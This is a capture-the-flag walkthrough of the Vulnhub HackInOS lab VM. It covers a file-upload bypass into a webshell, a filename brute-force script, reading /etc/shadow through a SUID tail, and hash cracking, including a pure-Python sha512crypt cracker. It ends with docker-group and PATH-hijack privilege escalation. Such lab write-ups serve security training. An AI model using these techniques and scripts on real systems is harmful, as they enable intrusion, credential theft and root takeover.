Vulnhub-HackInOS
Original article: http://www.valesec.top/archives/hackinos
Environment setup
Importing the HackInOS image
Import the image into VirtualBox, then open Settings, go to Network and set the attachment type to Host-only Adapter.
Starting the VM failed with the following error:
Call to NEMR0InitVMPart2 failed: VERR_NEM_INIT_FAILED (VERR_NEM_VM_CREATE_FAILED). Result Code: E_FAIL (0x80004005) Component: ConsoleWrap Interface: IConsole {872da645-4a9b-1727-bee2-5585105b9eed}
VERR_NEM_INIT_FAILED means VirtualBox tried to run on top of the Windows hypervisor (Hyper-V) and could not. Run the following from an administrator command prompt:
bcdedit /set hypervisorlaunchtype off
After a reboot the VM starts. Note that this turns the Windows hypervisor off entirely, so Hyper-V based features such as WSL 2 and Windows Sandbox stop working until you set it back to auto.
Connectivity configuration
The target image runs in VirtualBox, but the attacking machine runs in VMware Workstation, so VMware needs an extra network. Click Edit in the top-left corner and open the Virtual Network Editor.
Click Change Settings and add a new adapter named VMnet10.
Bridge that adapter to the VirtualBox host-only adapter; that completes the adapter side of the connection.
Then edit the Kali VM's network settings: attach the newly added network adapter to VMnet10, click OK and boot the VM.
Check the interfaces and IP addresses on Kali Linux:
root@kali:~/Desktop# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.88.128  netmask 255.255.255.0  broadcast 192.168.88.255
        inet6 fe80::20c:29ff:fe8c:9793  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:8c:97:93  txqueuelen 1000  (Ethernet)
        RX packets 5  bytes 866 (866.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9  bytes 1270 (1.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.102  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::20c:29ff:fe8c:979d  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:8c:97:9d  txqueuelen 1000  (Ethernet)
        RX packets 2  bytes 1180 (1.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9  bytes 1270 (1.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12  bytes 640 (640.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12  bytes 640 (640.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
eth1 has received an address in the same subnet as the VirtualBox host-only network.
Host discovery
# root @ kali in ~ [9:15:00]
$ arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:7f:7c:c9, IPv4: 192.168.56.108
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:10       (Unknown: locally administered)
192.168.56.100  08:00:27:10:29:98       PCS Systemtechnik GmbH
192.168.56.107  08:00:27:20:a9:bc       PCS Systemtechnik GmbH
Both 08:00:27 addresses are VirtualBox NICs; 192.168.56.100 is VirtualBox's own host-only DHCP server, so the target is 192.168.56.107.
Port scanning
The classic nmap scan:
# root @ kali in ~ [10:12:43] C:1
$ nmap -A 192.168.56.107
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-15 10:12 EST
Nmap scan report for 192.168.56.107
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA)
|   256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA)
|_  256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (ED25519)
8000/tcp open  http    Apache httpd 2.4.25
| http-robots.txt: 2 disallowed entries
|_/upload.php /uploads
|_http-title: Blog – Just another WordPress site
|_http-generator: WordPress 5.0.3
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 172.18.0.3; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Two details are worth noting before moving on. The SSH banner says Ubuntu while the web server identifies as Apache on Debian, and the Service Info line reports a host address of 172.18.0.3, a 172.18.0.0/16 address that is not the one we scanned. Both point to the web service running in a Docker container on an Ubuntu host, which is confirmed later.
Vulnerability scanning
Two ports are open; start with the web port. It is obviously a WordPress site, so run WPScan without further thought. nmap has already turned up robots.txt and upload.php; WPScan adds little beyond the version (5.0.3) and XML-RPC being enabled.
# root @ kali in ~ [10:18:34] C:4
$ wpscan --url "http://192.168.56.107:8000"
[+] URL: http://192.168.56.107:8000/ [192.168.56.107]
[+] Started: Mon Nov 15 10:19:37 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.25 (Debian)
 |  - X-Powered-By: PHP/7.2.15
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.107:8000/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.107:8000/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.107:8000/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.107:8000/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0.3 identified (Insecure, released on 2019-01-09).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.107:8000/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.3'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.107:8000/, Match: 'WordPress 5.0.3'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <============================================================================> (137 / 137) 100.00% Time: 00:00:00
Visit robots.txt first: it contains two Disallow entries, one of which is upload.php.
Source disclosure
Open the upload.php page.
It contains a file-upload form. Capture the request with Burp Suite; submitting the form with no file content produces a hint in an HTML comment:
<!-- https://github.com/fatihhcelik/Vulnerable-Machine---Hint -->
The linked repository contains the page's source:
<!DOCTYPE html>
<html>
<body>
<div align="center">
<form action="" method="post" enctype="multipart/form-data">
<br>
<b>Select image : </b>
<input type="file" name="file" id="file" style="border: solid;">
<input type="submit" value="Submit" name="submit">
</form>
</div>
<?php
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $rand_number = rand(1,100);
    $target_dir = "uploads/";
    $target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));
    $file_name = $target_dir . basename($_FILES["file"]["name"]);
    $uploadOk = 1;
    $imageFileType = strtolower(pathinfo($file_name,PATHINFO_EXTENSION));
    $type = $_FILES["file"]["type"];
    $check = getimagesize($_FILES["file"]["tmp_name"]);
    if($check["mime"] == "image/png" || $check["mime"] == "image/gif"){
        $uploadOk = 1;
    }else{
        $uploadOk = 0;
        echo ":)";
    }
    if($uploadOk == 1){
        move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType);
        echo "File uploaded /uploads/?";
    }
}
?>
</body>
</html>
File upload
The code checks the file content but not the extension: getimagesize() must report image/png or image/gif (the browser-supplied Content-Type in $type is read but never used), and the extension of the original filename is appended to the stored name unchanged. The standard bypass is a GIF file header followed by a webshell, here a Behinder (冰蝎) shell.
The upload succeeds, and the source also gives the naming rule: the original filename with a random number between 1 and 100 appended, hashed with MD5 (a hash, not encryption, so there are only 100 possible names). A script to find the stored file:
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
# Edit time: 2021/11/15 22:20
import hashlib
import requests

# upload.php stores the file as md5(name . rand(1,100)) . "." . ext
for i in range(1, 101):  # PHP rand(1,100) is inclusive on both ends
    name = "vulnhub.php" + str(i)
    file_name = hashlib.md5(name.encode('utf-8')).hexdigest()
    r = requests.get('http://192.168.56.107:8000/uploads/{}.php'.format(file_name))
    if r.status_code == 200:
        print("[+] Found http://192.168.56.107:8000/uploads/{}.php".format(file_name))
        break
Running it finds the uploaded file. Connect to it with Behinder; if the connection is unstable, upload a second copy into the html directory and reconnect (which is what I did).
Check the current user and working directory:
/var/www/html/ >id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/ >pwd
/var/www/html
/var/www/html/ >ls
index.php  license.txt  readme.html  robots.txt  shell.php  upload.php  uploads
wp-activate.php  wp-admin  wp-blog-header.php  wp-comments-post.php  wp-config-sample.php
wp-config.php  wp-content  wp-cron.php  wp-includes  wp-links-opml.php  wp-load.php
wp-login.php  wp-mail.php  wp-settings.php  wp-signup.php  wp-trackback.php  xmlrpc.php
Next, upgrade to an interactive terminal and look for binaries that run with elevated privileges:
# python -c "import pty;pty.spawn('/bin/bash');"   # not needed when using Behinder's virtual terminal
www-data@1afdd1f6b82c:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/tail
/usr/bin/chfn
/bin/mount
/bin/umount
/bin/su
tail is not normally SUID, and a SUID-root tail can read any file. Use it on /etc/shadow (-c1k prints the last 1 KiB, enough to cover the whole file here):
www-data@1afdd1f6b82c:/var/www/html$ tail -c1k /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::
Only root has a real hash. Save that line as hash.txt and crack it with john:
# root @ kali in ~ [9:51:46]
$ john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
john             (root)
1g 0:00:00:02 DONE 2/3 (2021-11-15 09:51) 0.4081g/s 1257p/s 1257c/s 1257C/s 123456..john
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The hash was cracked; show the password:
# root @ kali in ~ [9:51:55]
$ john hash.txt --show
root:john:17951:0:99999:7:::

1 password hash cracked, 0 left
The root password is john. Switch user:
www-data@1afdd1f6b82c:/var/www/html$ su root
Password:
root@1afdd1f6b82c:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@1afdd1f6b82c:/var/www/html# ls -al /root/
total 36
drwx------ 1 root root 4096 Mar  1  2019 .
drwxr-xr-x 1 root root 4096 Feb 23  2019 ..
-rw------- 1 root root   57 Mar  1  2019 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 2 root root 4096 Feb 24  2019 .nano
-rw-rw-rw- 1 root root   28 Feb 28  2019 .port
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root  169 Feb  9  2019 .wget-hsts
-rw-r--r-- 1 root root   27 Feb 28  2019 flag
root@1afdd1f6b82c:/var/www/html# cat /root/flag
Life consists of details..
The flag tells us to pay attention to details, so do another round of enumeration, starting with the .port file in /root:
root@1afdd1f6b82c:/var/www/html# cat /root/.port
Listen to your friends.. 7*
Then check the IP configuration. The address is a Docker internal one: 172.18.0.3/16 on a 02:42:ac:... MAC (Docker's bridge prefix), matching the host nmap reported in its Service Info line, and the hostname 1afdd1f6b82c is a container ID.
root@1afdd1f6b82c:/var/www/html# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.3  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:ac:12:00:03  txqueuelen 0  (Ethernet)
        RX packets 809714  bytes 5538987366 (5.1 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 790439  bytes 235593687 (224.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 360  bytes 19565 (19.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 360  bytes 19565 (19.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
What we have so far is root inside a Docker container; the real goal is root on the host. Tar up the web directory so it can be downloaded and audited:
root@1afdd1f6b82c:/var/www# tar -cvf html.tar html/
Download the archive and review it. wp-config.php contains the database credentials:
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'wordpress');
/** MySQL database password */
define('DB_PASSWORD', 'wordpress');
/** MySQL hostname */
define('DB_HOST', 'db:3306');
db is a Docker service name resolved by the container's DNS, so the database runs in a second container. Connect to the wordpress database with wordpress:wordpress:
root@1afdd1f6b82c:~# mysql -hdb -u wordpress -p wordpress
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 96
Server version: 5.7.25 MySQL Community Server (GPL)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [wordpress]>
The table list contains one table that is not part of WordPress, host_ssh_cred, holding an SSH username and a password hash:
MySQL [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| host_ssh_cred         |
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
13 rows in set (0.01 sec)

MySQL [wordpress]> select * from host_ssh_cred;
+-------------------+----------------------------------+
| id                | pw                               |
+-------------------+----------------------------------+
| hummingbirdscyber | e10adc3949ba59abbe56e057f20f883e |
+-------------------+----------------------------------+
1 row in set (0.01 sec)
The pw value is a 32-character hex string, i.e. an unsalted MD5. Looking it up on cmd5 gives the password 123456.
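Both cracking steps on this box, the sha512crypt root hash read with the SUID tail and the unsalted MD5 from host_ssh_cred, done offline in one place, as an added example rather than anything from the original page. sha512crypt is implemented from the glibc specification so the verification logic is visible instead of hidden inside john; the hashes are the ones shown above, and the four-word list is constructed for the demonstration.

```python
import hashlib
from typing import Dict, Iterable, Optional

# root's line from /etc/shadow as read on the target, plus two locked accounts,
# and the pw value from the host_ssh_cred table.
SHADOW_SAMPLE = (
    "root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::\n"
    "daemon:*:17931:0:99999:7:::\n"
    "www-data:*:17931:0:99999:7:::\n"
)
HOST_SSH_PW = "e10adc3949ba59abbe56e057f20f883e"
# Constructed tiny wordlist; a real run would use something like rockyou.txt.
WORDLIST = ["password", "wordpress", "123456", "john"]

_B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _b64_24bit(b2: int, b1: int, b0: int, n: int) -> str:
    """crypt(3) base64: 24 bits in, emitted low 6 bits first, custom alphabet."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(_B64[w & 0x3F])
        w >>= 6
    return "".join(out)


def sha512crypt(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    """Pure-Python sha512crypt ($6$), following the glibc algorithm step by step."""
    salt = salt[:16]
    plen, slen = len(password), len(salt)
    b = hashlib.sha512(password + salt + password).digest()
    a = hashlib.sha512(password + salt)
    a.update(b * (plen // 64) + b[: plen % 64])
    n = plen
    while n:  # one step per bit of the password length
        a.update(b if n & 1 else password)
        n >>= 1
    a = a.digest()
    dp = hashlib.sha512(password * plen).digest()
    p = dp * (plen // 64) + dp[: plen % 64]
    ds = hashlib.sha512(salt * (16 + a[0])).digest()
    s = ds * (slen // 64) + ds[: slen % 64]
    c = a
    for i in range(rounds):  # the expensive part: 5000 SHA-512 calls per guess
        h = hashlib.sha512()
        h.update(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    # Output permutation: byte triples (x, x+21, x+42) mod 63 with x stepping by 22,
    # then the last byte alone.
    enc = "".join(
        _b64_24bit(c[x], c[(x + 21) % 63], c[(x + 42) % 63], 4)
        for x in ((22 * k) % 63 for k in range(21))
    )
    enc += _b64_24bit(0, 0, c[63], 2)
    prefix = "$6$" if rounds == 5000 else f"$6$rounds={rounds}$"
    return f"{prefix}{salt.decode()}${enc}"


def parse_shadow(text: str) -> Dict[str, str]:
    """user -> hash field, skipping accounts that are locked or have no password."""
    creds = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) >= 2 and parts[1] not in ("", "*", "!", "!!"):
            creds[parts[0]] = parts[1]
    return creds


def check(candidate: str, stored: str) -> bool:
    """Verify one candidate against a $6$ crypt hash or a raw 32-hex MD5."""
    pw = candidate.encode()
    if stored.startswith("$6$"):
        fields = stored.split("$")  # ['', '6', ['rounds=N',] salt, hash]
        rounds = 5000
        if fields[2].startswith("rounds="):
            rounds = int(fields[2][len("rounds="):])
            fields.pop(2)
        return sha512crypt(pw, fields[2].encode(), rounds) == stored
    if len(stored) == 32:
        return hashlib.md5(pw).hexdigest() == stored.lower()
    raise ValueError("unsupported hash format")


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    for word in wordlist:
        if check(word, stored):
            return word
    return None


if __name__ == "__main__":
    for user, h in parse_shadow(SHADOW_SAMPLE).items():
        print(user, crack(h, WORDLIST))
    print("hummingbirdscyber", crack(HOST_SSH_PW, WORDLIST))
```

The contrast between the two hashes is the point: each sha512crypt guess costs 5000 SHA-512 computations and is tied to a salt, while the MD5 in host_ssh_cred is a single unsalted digest, which is why a precomputed-lookup site like cmd5 answers it instantly.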
Log in to the target over SSH as hummingbirdscyber:123456:
C:\Users\valecalida\Desktop>ssh hummingbirdscyber@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:TW0nX/yND0yHIOROC6P/fnW1FZBF8bZkZUA258XTvD0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
hummingbirdscyber@192.168.56.101's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-29-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

95 packages can be updated.
0 updates are security updates.

*** System restart required ***
Last login: Fri Mar  1 23:58:08 2019 from 192.168.1.31
hummingbirdscyber@vulnvm:~$
The login succeeds, and this time we are on the Ubuntu host itself.
Privilege escalation
Docker privilege escalation
Check the user's privileges: hummingbirdscyber belongs to the docker group (gid 129), and the IP information confirms we are on the internal host. Membership in the docker group is effectively root, because the Docker daemon runs as root and will mount whatever it is asked to.
hummingbirdscyber@vulnvm:~/Desktop$ id
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)
So we can escalate through docker: docker run -it -v /:/root ubuntu /bin/bash
-v /:/root bind-mounts the host's entire root filesystem at /root inside the container, so the host's /root directory appears as /root/root. The ubuntu image has to be present locally already, since the VM is on a host-only network.
hummingbirdscyber@vulnvm:~/Desktop$ docker run -it -v /:/root ubuntu /bin/bash
root@0a513b8ee17a:/# id
uid=0(root) gid=0(root) groups=0(root)
root@0a513b8ee17a:/# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@0a513b8ee17a:/# ls /root/root
flag
root@0a513b8ee17a:/# cat /root/root/flag
Congratulations!
(followed by an ASCII-art banner)
This way we obtain the flag.
Second escalation
That is still a root shell inside a container with the host filesystem mounted, not a root shell on the host itself (the mount alone would already let us edit the host's /etc/passwd or plant a SUID binary, but the box offers a more direct route). Look for SUID files on the host:
hummingbirdscyber@vulnvm:~/Desktop$ find / -perm -u=s -type f 2>/dev/null
/home/hummingbirdscyber/Desktop/a.out
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/bin/mount
/bin/ping6
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/fusermount
/bin/ping
Among the usual system binaries is /home/hummingbirdscyber/Desktop/a.out, a custom SUID binary owned by root:
hummingbirdscyber@vulnvm:~/Desktop$ ls -al a.out
-rwsr-xr-x 1 root root 8720 Mar  1  2019 a.out
hummingbirdscyber@vulnvm:~/Desktop$ file a.out
a.out: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c26eb2ef5db60afbef3a4357d92af730870b2fd4, not stripped
Running it prints root, which is what whoami reports when the effective UID is 0:
hummingbirdscyber@vulnvm:~/Desktop$ ./a.out
root
The program behaves like the Linux whoami command, which suggests it runs whoami through the shell by bare name rather than by absolute path. So write a whoami.c of our own:
#include <stdlib.h>

/* Replacement "whoami": a.out runs with an effective UID of 0, and bash -p
 * keeps that effective UID instead of dropping back to the real user. */
int main(void)
{
    system("/bin/bash -p");
    return 0;
}
Compile it:
hummingbirdscyber@vulnvm:~$ vi whoami.c
hummingbirdscyber@vulnvm:~$ gcc -o whoami whoami.c
hummingbirdscyber@vulnvm:~$ chmod +x whoami
During enumeration the environment variables turned up something interesting:
hummingbirdscyber@vulnvm:~$ echo $PATH
/home/hummingbirdscyber/bin:/home/hummingbirdscyber/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
/home/hummingbirdscyber/bin comes first, ahead of every system directory, so a whoami placed there shadows /usr/bin/whoami for any bare-name lookup. Create the bin directory, copy our whoami into it and make it executable:
hummingbirdscyber@vulnvm:~$ mkdir bin
hummingbirdscyber@vulnvm:~$ cp Desktop/whoami bin/
hummingbirdscyber@vulnvm:~$ ls bin/
whoami
hummingbirdscyber@vulnvm:~$ chmod 755 bin/whoami
Now run a.out: its call to whoami resolves to our binary and we get a root shell on the host:
hummingbirdscyber@vulnvm:~$ ./Desktop/a.out
root@vulnvm:~# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker),1000(hummingbirdscyber)
root@vulnvm:~# ls /
bin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  sys  usr  vmlinuz
boot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   tmp  var
root@vulnvm:~# cat /root/flag
Congratulations!
(followed by an ASCII-art banner)
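Why the last step works, as an added example that is not part of the walkthrough: a.out calls whoami by bare name through system(), so /bin/sh resolves it against PATH and finds the user-controlled ~/bin first. The script below reproduces the hijack unprivileged in a temporary directory (a shell script stands in for the compiled whoami, and no SUID bit is involved; the walkthrough's real shim needs bash -p because bash drops an effective UID of 0 unless started with -p) and shows the two fixes: calling the absolute path, or having the privileged binary set a trusted PATH before calling system(). TARGET_PATH is the value printed on the box; everything else is assumed.

```python
import os
import shutil
import subprocess
import tempfile

# PATH observed on the target (from the walkthrough); the user-owned
# ~/bin and ~/.local/bin come before every system directory.
TARGET_PATH = ("/home/hummingbirdscyber/bin:/home/hummingbirdscyber/.local/bin:"
               "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:"
               "/usr/games:/usr/local/games:/snap/bin")


def user_dirs_before_system(path: str, home: str) -> list:
    """PATH entries under the user's home that precede the first system
    directory: each one lets that user shadow any bare command name."""
    found = []
    for entry in path.split(":"):
        if entry.startswith(home.rstrip("/") + "/"):
            found.append(entry)
        else:
            break
    return found


def plant_shim(dirpath: str, name: str, marker: str) -> str:
    """Drop an executable script called `name` that prints `marker`; it plays
    the role of the compiled whoami from the walkthrough."""
    os.makedirs(dirpath, exist_ok=True)
    shim = os.path.join(dirpath, name)
    with open(shim, "w") as fh:
        fh.write(f"#!/bin/sh\necho {marker}\n")
    os.chmod(shim, 0o755)
    return shim


def run_via_system(command: str, path: str) -> str:
    """Same resolution as C's system(): /bin/sh -c looks a bare name up in PATH."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True,
                            env={"PATH": path})
    return result.stdout.strip()


def demo() -> dict:
    tmp = tempfile.mkdtemp(prefix="pathhijack-")
    try:
        plant_shim(os.path.join(tmp, "bin"), "whoami", "hijacked")
        attacker_path = f"{tmp}/bin:/usr/bin:/bin"  # same shape as TARGET_PATH
        return {
            "resolved": shutil.which("whoami", path=attacker_path),
            "vulnerable": run_via_system("whoami", attacker_path),
            # fix 1: an absolute path, so PATH is never consulted
            "absolute": run_via_system("/usr/bin/whoami", attacker_path),
            # fix 2: the privileged program resets PATH before calling system()
            "sanitized": run_via_system("whoami", "/usr/bin:/bin"),
        }
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    print(user_dirs_before_system(TARGET_PATH, "/home/hummingbirdscyber"))
    print(demo())
```

On the real box the shim also has to keep the effective UID: a plain shell script would run with euid 0 under /bin/sh, but the walkthrough's compiled wrapper calling /bin/bash -p is the reliable choice. Either fix above closes the hole; a SUID binary that shells out with a bare command name and inherits the caller's PATH is the bug, not the writable ~/bin.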